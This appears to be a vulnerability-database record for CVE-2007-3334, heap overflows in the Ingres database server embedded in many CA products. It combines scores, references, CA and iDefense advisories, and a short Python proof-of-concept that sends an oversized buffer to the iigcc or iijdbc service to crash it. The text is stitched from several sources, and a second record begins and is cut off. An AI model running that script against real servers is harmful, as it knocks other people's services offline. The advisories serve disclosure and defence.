"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:etrust_secure_content_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ingres:database_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:microsoft:windows",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSEChris Anley\u203b chris@ngssoftware.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
],
"trust": 0.6
},
"cve": "CVE-2007-3334",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2007-3334",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-3334",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2007-3334",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200706-357",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. \nSuccessful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the \u0027alarkp.def\u0027 file. \n\n3) Ingres wakeup file overwrite (reported by NGSSoftware) \n[Ingres bug 115913, CVE-2007-3337, CAID 35451]\nDescription: The \"wakeup\" binary creates a file named \n\"alarmwkp.def\" in the current directory, truncating the file if it \nalready exists. The \"wakeup\" binary is setuid \"ingres\" and \nworld-executable. Consequently, an attacker can truncate a file \nwith the privileges of the \"ingres\" user. \n\n4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: An attacker can pass a long string as an argument to \nuuid_from_char() to cause a stack buffer overflow and the saved \nreturned address can be overwritten. \n\n5) Ingres verifydb local stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: A local attacker can exploit a stack overflow in the \nIngres verifydb utility duve_get_args function. This only \naffects Ingres on the Windows operating system. Reported by \niDefense as IDEF2023. This only affects Ingres on the Windows \noperating system. Reported by iDefense as IDEF2022. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a cumulative High \nrisk rating. \n\nAffected Products:\nAdvantage Data Transformer r2.2\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\nAllFusion Harvest Change Manager r7, r7.1\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, \n Linux and Mainframe Linux)\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\nBrightStor Enterprise Backup (Unix only) r10.5\nBrightStor Storage Command Center r11.5\nBrightStor Storage Resource Manager r11.5\nCleverPath Aion Business Rules Expert r10.1\nCleverPath Aion Business Process Monitoring r10.1\nCleverPath Predictive Analysis Server r3\nDocServer 1.1\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\neTrust Audit r8 SP2\neTrust Directory r8.1\neTrust IAM Suite r8.0\neTrust IAM Toolkit r8.0, r8.1\neTrust Identity Manager r8.1\neTrust Network Forensics r8.1\neTrust Secure Content Manager r8\neTrust Single Sign-On r7, r8, r8.1\neTrust Web Access Control 1.0\nUnicenter Advanced Systems Management r11\nUnicenter Asset Intelligence r11\nUnicenter Asset Management r11\nUnicenter Asset Portfolio Management r11.2.1, r11.3\nUnicenter CCS r11\nUnicenter Database Command Center r11.1\nUnicenter Desktop and Server Management r11\nUnicenter Desktop Management Suite r11\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\nUnicenter Job Management Option r11\nUnicenter Lightweight Portal 2\nUnicenter Management Portal r3.1.1\nUnicenter Network and Systems Management r3.0, r11\nUnicenter Network and Systems Management - Tiered - Multi Platform \n r3.0 0305, r3.1 0403, r11.0\nUnicenter Patch Management r11\nUnicenter Remote Control 6, r11\nUnicenter Service Accounting r11, r11.1\nUnicenter Service Assure r2.2, r11, r11.1\nUnicenter Service Catalog r11, r11.1\nUnicenter Service Delivery r11.0, r11.1\nUnicenter Service Intelligence r11\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, \n r11.1, r11.2\nUnicenter Software Delivery r11\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\nUnicenter Workload Control Center r1 SP3, r1 SP4\nUnicenter Web Services Distributed Management 3.11, 3.50\nWily SOA Manager 7.1\n\nAffected Platforms:\nAll operating system platforms supported by the various CA \nproducts that embed Ingres. This includes Windows, Linux, and \nsupported UNIX platforms. \n\nStatus and Recommendation:\nCA recommends that customers apply the appropriate fix(es) listed \non the Security Notice page: \nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nCA SupportConnect Security Notice for these vulnerabilities:\nIngres Security Alert\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\nImportant Security Notice for Customers Using Products That Embed \nIngres\nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\nCA Security Advisor posting: \nCA Products That Embed Ingres Multiple Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453\nIngres knowledge base document:\nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl\nReported By: NGSSoftware, and iDefense\nNGSSoftware Advisory: \nhttp://www.ngssoftware.com/research/advisories/\niDefense Advisory: \nIngres Database Multiple Heap Corruption Vulnerabilities\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546\nCVE References:\nCVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. Ingres Database Multiple Heap Corruption Vulnerabilities\n\niDefense Security Advisory 06.21.07\nhttp://labs.idefense.com/intelligence/vulnerabilities/\nJun 21, 2007\n\nI. BACKGROUND\n\nIngres is the database backend used by default in several CA products. \nThe SCM (Secure Content Manager) is one of the products that uses\nIngres. The SCM use Ingres to store quarantined virii and blocked HTTP\nrequests/replies. For more information visit the following URLs. \n\nhttp://www3.ca.com/solutions/Product.aspx?ID=1013\n\nhttp://www.ingres.com/\n\nII. The Communications\nServer is the main component responsible for receiving and handling\nrequests from the network. The Data Access Server is responsible for\nhandling requests from the Ingres JDBC Driver and .NET data providers. \nThese requests are decoded into Ingres internal formats and passed on\nto other components of the database server. \n\nThe application does not properly validate the length of attacker\nsupplied data before copying it into a fixed size heap buffer. This\nleads to an exploitable condition. \n\nIII. ANALYSIS\n\nExploitation allows an unauthenticated attacker to execute arbitrary\ncode with SYSTEM privileges. \n\nIn order to exploit this vulnerability an attacker would have to send a\nmalformed request to the database server. This requires the ability to\nestablish a TCP session on port 10916 (iigcc) or 10923 (iigcd). \n\nExploitation has been demonstrated to be trivial. \n\nIV. Previous versions may also be affected. In addition, any\napplication that uses the Ingres Database may be vulnerable. \n\nV. WORKAROUND\n\nEmploying firewalls or other access control methods can effectively\nreduce exposure to this vulnerability. \n\nVI. VENDOR RESPONSE\n\nCA has made fixes available for all supported CA products that embed\nIngres. For more information consult CA\u0027s Security Alert at the\nfollowing URL. \n\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2007-3334 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n01/16/2007 Initial vendor notification\n01/17/2007 Initial vendor response\n06/21/2007 Coordinated public disclosure\n\nIX. CREDIT\n\nThe discoverer of this vulnerability wishes to remain anonymous. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2007 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities\n# Date: 2010-08-14\n# Author: fdisk\n# Version: 2.6\n# Tested on: Windows 2003 Server SP1 en\n# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338\n# Notes: Fixed in the last version. \n# please let me know if you are/were able to get code execution \u003crr dot fdisk at gmail dot com\u003e\n \nimport socket\nimport sys\n \nif len(sys.argv) != 4:\n print \"Usage: ./CAAdvantageDoS.py \u003cTarget IP\u003e \u003cPort\u003e \u003cService\u003e\"\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \nhost = sys.argv[1]\nport = int(sys.argv[2])\nservice = sys.argv[3]\n \nif service == \"iigcc\":\n payload = \"\\x41\" * 2106\nelif service == \"iijdbc\":\n payload = \"\\x41\" * 1066\nelse:\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n \npayload += \"\\x42\" * 4\n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint \"Sending payload\"\ns.send(payload)\ndata = s.recv(1024)\ns.close()\nprint \u0027Received\u0027, repr(data)\n \nprint service + \" crashed\"\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3334"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "BID",
"id": "24585"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-3334",
"trust": 3.0
},
{
"db": "BID",
"id": "24585",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "25775",
"trust": 1.6
},
{
"db": "SECUNIA",
"id": "25756",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2288",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2007-2290",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1018278",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "37487",
"trust": 1.0
},
{
"db": "OSVDB",
"id": "37488",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222",
"trust": 0.8
},
{
"db": "XF",
"id": "35002",
"trust": 0.6
},
{
"db": "XF",
"id": "34992",
"trust": 0.6
},
{
"db": "XF",
"id": "34991",
"trust": 0.6
},
{
"db": "IDEFENSE",
"id": "20070621 INGRES DATABASE MULTIPLE HEAP CORRUPTION VULNERABILITIES",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "57303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57276",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "92818",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"id": "VAR-200706-0395",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2025-04-10T22:57:36.934000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.actian.com/products/ingres"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://windows.microsoft.com/en-US/windows/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"trust": 2.0,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"trust": 2.0,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"trust": 1.6,
"url": "http://www.securitytracker.com/id?1018278"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/24585"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25775"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25756"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34992"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34991"
},
{
"trust": 1.0,
"url": "http://osvdb.org/37488"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"trust": 1.0,
"url": "http://osvdb.org/37487"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35002"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3334"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3334"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/35002"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34992"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34991"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2290"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2288"
},
{
"trust": 0.4,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "/archive/1/472192"
},
{
"trust": 0.3,
"url": "/archive/1/471950"
},
{
"trust": 0.3,
"url": "/archive/1/472197"
},
{
"trust": 0.3,
"url": "/archive/1/472193"
},
{
"trust": 0.3,
"url": "/archive/1/472194"
},
{
"trust": 0.3,
"url": "/archive/1/472200"
},
{
"trust": 0.3,
"url": "msg://bugtraq/649cdcb56c88aa458eff2cbf494b6204030a79ca@usilms12.ca.com"
},
{
"trust": 0.3,
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3334"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3336"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3337"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3336"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3337"
},
{
"trust": 0.1,
"url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415738+htmpl=kt_document_view.htmpl"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://www.ngssoftware.com/research/advisories/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/solutions/product.aspx?id=1013"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/),"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-21T00:00:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"date": "2007-06-26T21:32:27",
"db": "PACKETSTORM",
"id": "57303"
},
{
"date": "2007-06-26T20:06:58",
"db": "PACKETSTORM",
"id": "57276"
},
{
"date": "2010-08-17T01:35:50",
"db": "PACKETSTORM",
"id": "92818"
},
{
"date": "2007-06-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"date": "2007-06-21T22:30:00",
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-19T08:36:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"date": "2007-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "57276"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "eTrust Secure Content Manager including CA Used in products Ingres Database Server For Communications Server Heap-based buffer overflow vulnerability in components",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
}
],
"trust": 0.6
}
}
VAR-200706-0398
Vulnerability from variot - Updated: 2025-04-10 22:57wakeup in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allows local users to truncate arbitrary files via a symlink attack on the alarmwkp.def file. Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed Ingres Multiple Vulnerabilities
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
CA Advisory Date: 2007-06-21
Reported By: NGSSoftware, and iDefense
Impact: Attackers can potentially execute arbitrary code, or overwrite files.
Summary: Various CA products that embed Ingres products contain multiple vulnerabilities that can allow an attacker to potentially execute arbitrary code. CA has issued fixes, to address all of these vulnerabilities, for all supported CA products that may be affected.
1) Ingres controllable pointer overwrite vulnerability (reported by NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450] Description: An unauthenticated attacker can potentially execute arbitrary code within the context of the database server.
2) Ingres remote unauthenticated pointer overwrite #2 (reported by NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450] Description: An unauthenticated attacker can exploit a pointer overwrite vulnerability to execute arbitrary code within the context of the database server.
3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user.
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow and the saved returned address can be overwritten.
5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function.
6) Communication server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the communications server (iigcc.exe). This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023.
7) Data Access/JDBC server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the Data Access server (iigcd.exe) in r3 or the JDCB server in older releases. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High risk rating.
Affected Products: Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure 